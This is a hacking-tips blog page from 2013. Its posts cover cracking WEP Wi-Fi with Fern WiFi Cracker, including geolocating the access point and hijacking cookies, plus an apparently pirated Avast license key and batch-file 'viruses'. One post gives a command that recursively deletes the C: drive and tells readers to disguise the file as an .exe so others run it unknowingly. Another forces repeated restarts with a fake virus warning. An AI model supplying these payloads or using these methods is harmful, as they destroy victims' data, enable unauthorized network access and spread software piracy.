Saturday, 30 November 2013
Thursday, 28 November 2013
1. RPV (Required Page Views) From 1 to 5
if in the (RPV / Work) field you see RPV value 1, 2, 3, 4 or 5 click button a website will open, then visit any sub page with your own interest up to the given RPV value.
For Example : Watch the "Work No 2" in the screenshot of start today work page below. Its RPV value is 2, first of all you will open this website and when this website is loaded completely visit any 2 web pages of your own interest.
Labels:
earning
So lets begin ...
Go to backtrack -> exploitation tools -> wireless exploitation tools ->
WLAN exploitation --> fern-wifi-cracker... .
interface you have ( it can be wlan0, wlan1 etc....
Now there's a button on which you can see wifi logo, click that and it will start the network scanning of-course its using airodum p here).
Note*: if you double-click anywhere in the tool, you'll get a "settings" dialog box... you can set the channel there and also you can start the xterm............
Now if you see closely, you'll note that the two buttons below the scan button will get enabled, the first button is the WEP cracking button and the second one is for WPA cracking.
Click the button for WEP cracking...
After clicking that button, a new dialog box will open. you can select the wep network from the list and then you can select the type of attack i.e arp replay attack, chop-chop attack or fragmentation attack. then click "Attack"....
You'll be able to see the number of ivs are increasing.There's a progress bar at the end of the dialog box.When the progress bar reaches the end, this tool starts aircrack for cracking wifi password
When the password is cracked, it will be shown at the bottom of the dialog box...
NOW COMES THE INTERESTING PART:
(before going further, i suggest you to connect to the internet for this)
Go to "toolbox" --> Geolocatory tracker.....
Give the bssid of the AP in the text box and click "Trace".......
I think everyone has already guessed what it will show...
YES... INDEED... IT WILL SHOW YOU THE LOCATION OF THE AP ON THE GOOGLE MAPS ... You can see the coordinates as well..
And also you can see in the toolbox, there's a button for cookie hijacking called "cookie hijacker" ..
ok guys so that's it for now. :-).....
Labels:
Wifi Hacker
Sunday, 24 November 2013
Avast Antivirus New 2014 With License Key
Your license key is:
---------- Cut here ----------
C64806691H1200A0215-ND5CMWHJ
Labels:
Antivirus
Wednesday, 6 November 2013
How to Make a Deadly Virus To Crash Operating System
Warning: Never use it on your own computer. If Program accidentally get activated on your system, You can't repair it again. In this case you have to reinstall your window again.!!!!
Step 1: Open NOTEPAD and type this command :-
RD c:\ /s /q
Note: C:\ is the location where system files are located. You can change it.
Step 2: Now save as this file and give any name you want with extension .exe and save as file type (all files).
Note: Actually it's a batch file program. But most of the people runs .exe files without thinking anything.. So I am using .exe extension instead of .bat |
Labels:
Virus Stuff
Create Virus Using JPS (Virus Maker)
This is a small but very useful software . With the help of this you can create any type of trojans and program it to do whatever you want.
This can be programmed to do the following things:
This can be programmed to do the following things:
Labels:
Virus Stuff
How to easily create virus to restart pc
Well, I know there are lots of techniques available to restart computer. But all the techniques requires a basic knowledge of programming. But in this technique you do not need to know whole programming language but you need just little programming knowledge. You can also create a program to restart window automatically every start upusing c or c++ language.You can also programming in other languages and make virus to create a virus to restart program.
So remember friends, it is not a real virus and the main instance is not to make a virus but i want to teach you something in batch programming. so let's start.
So remember friends, it is not a real virus and the main instance is not to make a virus but i want to teach you something in batch programming. so let's start.
What is batch programming?
Batch programming is the programming language offered by Microsoft windows operating system. Batch file can be created using any of text editors like word pad notepad etc.Thisprogramming language is deserves interpreter method means it executed line by line.
You can perform lots of operation using this programming language like deleting files of same type or diffrent types,clear unwanted computer craps,creating logs and also create batch virus like restart window every time when it start.
So first open notepad and paste there following code.
cd..
shutdown /t 30 /r /c "Your computer detects a virus"
Now save as it with .bat extension. and run the file and thats it.
You can see the message that " Your computer detects Virus" and the computer will be shut down in 30 seconds and restart again.
Here,
/t indicates time interval that can be changed.
/r indicates restart windows you can change it to /s to only shutdown windows.
/c indicates the message that you want to display.
Labels:
Virus Stuff
Subscribe to:
Posts (Atom)